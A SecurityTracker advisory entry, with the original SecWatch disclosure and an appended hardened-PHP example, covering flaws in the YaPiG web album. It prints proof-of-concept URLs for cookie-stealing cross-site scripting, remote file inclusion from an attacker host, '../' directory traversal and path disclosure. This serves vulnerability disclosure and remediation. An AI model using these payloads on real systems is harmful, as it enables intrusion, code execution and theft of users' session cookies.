YaPiG Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Create/Delete Directories and Let Remote Users Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID: 1014103
SecurityTracker URL: http://securitytracker.com/id?1014103
CVE Reference: CAN-2005-1881, CAN-2005-1882, CAN-2005-1883, CAN-2005-1884, CAN-2005-1885, CAN-2005-1886
Updated: Jun 9 2005
Original Entry Date: Jun 5 2005
Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included: Yes
Version(s): 0.92b, 0.93u, and 0.94u
Description: SecWatch reported several vulnerabilities in YaPiG. A remote user can conduct cross-site scripting attacks and determine the installation path. A remote authenticated user can execute arbitrary PHP code and operating system commands on the target system and can create and delete directories on the target system.

The 'upload.php' script does not properly validate file extensions of uploaded image files. A remote authenticated user can upload files containing arbitrary content, such as PHP code, and then cause the target web server to execute the files. The PHP code, including operating system commands, will run with the privileges of the target web service. Some demonstration exploit URLs are provided:
http://[target]/global.php?BASE_DIR=/local/path/to/global-gen.php
http://[target]/last_gallery.php?YAPIG_PATH=http://[attacker]/

The script also fails to properly validate user-supplied input in the 'dir' parameter before using the data as part of rmdir() and mkdir() function calls. A remote authenticated user can submit specially crafted parameter values containing '../' directory traversal characters to create and delete arbitrary directories located outside of the gallery directory. Some demonstration exploit URLs are provided:
http://[target]/upload.php?step=rmdir&dir=../folder
http://[target]/upload.php?step=mkdir&dir=../folder

Several scripts include files relative to parameters that can be modified by remote users. A remote user can supply a specially crafted parameter value to cause arbitrary PHP code from a remote site to be included and executed by the target web service.

The 'view.php' script does not properly validate user-supplied input in the 'phid' parameter. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the YaPiG software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user. A demonstration exploit URL is provided:
http://[target]/view.php?gid=1&phid=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

Other parameters are affected when a remote user adds a new comment.

The system stores plain text authentication data on the target user's browser if the '$USE_COOKIES=true;' parameter is set. A local user on the target user's system can obtain authentication data.

A remote user can also supply the following type of URL to cause the system to disclose the installation path:
http://[target]/view.php?gid=1&phid=alpha

The vendor was notified on May 30, 2005, without response.

SecWatch reported this vulnerability. An anonymous person discovered the vulnerability.

The original advisory is available at:
http://secwatch.org/advisories/secwatch/20050530_yapig.txt
Impact: A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the YaPiG software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
A remote authenticated user can upload scripting code to the target system and execute the code.
A remote authenticated user can create and delete directories on the target system.
A remote authenticated user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
A remote user can determine the installation path.
Solution: No solution was available at the time of this entry.
Vendor URL: yapig.sourceforge.net/
Cause: Access control error, Input validation error
Underlying OS: Linux (Any), UNIX (Any)
Reported By: info@secwatch.co.uk
Message History:
None.

Source Message Contents

Date: Sat, 4 Jun 2005 23:43:30 +0100 (BST)
From: info@secwatch.co.uk
Subject: YaPiG Remote Arbitrary File Inclusion,

======================================================================
SecWatch 04/06/2005
YaPiG Remote Arbitrary File Inclusion, Cross-Site Scripting
and Information Disclosure Vulnerabilities
======================================================================
Table of Contents
Product Introduction.................................................1
Affected ............................................................2
Severity.............................................................3
Description of Vulnerability.........................................4
Proof of Concept.....................................................5
Solution.............................................................6
Time Line............................................................7
Credits..............................................................8
======================================================================
1) Introduction
Homepage: http://yapig.sourceforge.net/
Overview: YaPiG is a simple but powerful web album.
Advisory: http://secwatch.org/advisories/secwatch/20050530_yapig.txt
SWID: 1010769
======================================================================
2) Affected
YaPiG version 0.92b, 0.93u and 0.94u.
Prior versions may also be affected.
======================================================================
3) Severity
Rating: Less Critical
Impact: Exposure of system information
System access
Manipulation of data
Cross Site Scripting
Where: From remote
Action: Public disclosure
======================================================================
4) Description of Vulnerabilities
Multiple input validation and design vulnerabilities in YaPiG have been
reported, which can be exploited by remote users to execute arbitrary
code, conduct cross-site scripting attacks, disclose sensitive
information, create and remove arbitrary directories and potentially gain
administrative access to the web album.
The "upload.php" script fails to verify the extension of uploaded images, so
a remote, authenticated user can upload arbitrary files (e.g. PHP files) and
execute arbitrary commands on the target system with the privileges of the
target web server.
Numerous scripts include other scripts insecurely; if register_globals is
enabled, a remote, unauthenticated user can include arbitrary files from
local and remote resources.
The "view.php" script fails to correctly sanitise user-supplied input
passed to the "phid" parameter, which a remote user can exploit to execute
arbitrary script code in the security context of an affected website. As a
result, the code will be able to access any of the target user's cookies,
access data recently submitted by the target user via web form to the
site, or take actions on the site acting as the target user.
The "view.php" script also fails to sanitise user-supplied input POSTed to
various parameters when adding a new comment, which can also be exploited
to conduct cross-site scripting attacks.
The "view.php" script also discloses the full installation path upon a
non-integer value being passed to the "phid" parameter.
The "upload.php" script fails to validate user-supplied input passed to
the "dir" parameter before being used in "rmdir()" and "mkdir()" calls. A
remote, authenticated user can create and remove arbitrary directories
outside of the gallery directory via the common "../" directory traversal
characters.
If "$USE_COOKIES=true;" is set (non-default) authentication details are
stored in plain text in session cookies. A local user can access browser
cookies to gain administrative access to the web album.
Various other scripts/parameters are reportedly affected by similar issues.
======================================================================
5) Proof of Concept
Cross-Site Scripting:
http://[target]/view.php?gid=1&phid=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
Arbitrary File Inclusion:
Version 0.92b:
http://[target]/global.php?BASE_DIR=/local/path/to/global-gen.php
Version 0.93u/ 0.94u:
http://[target]/last_gallery.php?YAPIG_PATH=http://[attacker]/
Arbitrary Directory Removal:
http://[target]/upload.php?step=rmdir&dir=../folder
Arbitrary Directory Creation:
http://[target]/upload.php?step=mkdir&dir=../folder
Information Disclosure:
http://[target]/view.php?gid=1&phid=alpha
======================================================================
6) Solution
Edit source manually to ensure user-supplied input is correctly sanitised.
Filter malicious characters and character sequences via a HTTP proxy or
firewall with URL filtering capabilities.
Production systems should not display errors to clients.
Set 'register_globals=Off' in php.ini.
Use another product.
======================================================================
7) Time Line
29/05/2005 - Information reported to SecWatch.
30/05/2005 - Information validated by SecWatch.
Vendor notified, no response.
02/06/2005 - Vendor notified via alternative e-mail address, no response.
04/06/2005 - Public disclosure.
======================================================================
8) Credits
Discovered by an anonymous person, reported via SecWatch.
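
Section 6 advises editing the source so that user-supplied input is correctly sanitised. The following is an added example of what that looks like for the three inputs the advisory names ('dir', the upload file name and 'phid'); it is not YaPiG's own code, and GALLERY_ROOT, the function names and the request-handling lines at the bottom are assumptions.

```php
<?php
// Added example, not YaPiG's own code: hardened handling of the three inputs the
// advisory names ('dir', the upload file name, 'phid'). GALLERY_ROOT, the function
// names and the request-handling lines at the bottom are assumptions.

ini_set('display_errors', '0');                       // no path disclosure via PHP errors
const GALLERY_ROOT = '/var/www/yapig/img';            // assumed gallery location
const ALLOWED_EXT  = ['jpg', 'jpeg', 'gif', 'png'];    // image extensions only

// 'dir' for step=mkdir / step=rmdir: accept a single plain path component, so a
// value such as '../folder' can never resolve outside GALLERY_ROOT.
function safe_gallery_dir(string $dir): ?string
{
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $dir)) {
        return null;                                  // rejects '/', '..', NUL, spaces
    }
    $root = realpath(GALLERY_ROOT);
    $path = GALLERY_ROOT . '/' . $dir;
    // Second check on the resolved parent, in case GALLERY_ROOT itself is a symlink.
    if ($root === false || realpath(dirname($path)) !== $root) {
        return null;
    }
    return $path;
}

// Upload file name: keep only an allow-listed extension and discard the client's
// name entirely, so 'shell.php' (or 'shell.php.jpg' on a server that maps
// multiple extensions) is never stored under a name PHP would execute.
function safe_upload_name(string $clientName): ?string
{
    $ext = strtolower(pathinfo(basename($clientName), PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;
    }
    return bin2hex(random_bytes(8)) . '.' . $ext;    // server-chosen name, e.g. <hex>.jpg
}

// 'phid' on view.php: must be a positive integer. Rejecting anything else means a
// value like '"><script>' is never echoed into the page and a value like 'alpha'
// never reaches code that would fail and print the installation path.
function safe_photo_id(string $phid): ?int
{
    $id = filter_var($phid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Request handling (assumed): refuse bad input with a generic message.
$dir = safe_gallery_dir((string)($_GET['dir'] ?? ''));
if ($dir === null) { http_response_code(400); exit('Invalid directory name.'); }
```

The same pattern applies to the remote-inclusion issue: paths such as BASE_DIR and YAPIG_PATH should be set in configuration only, never read from request variables, and register_globals should be off as section 6 states.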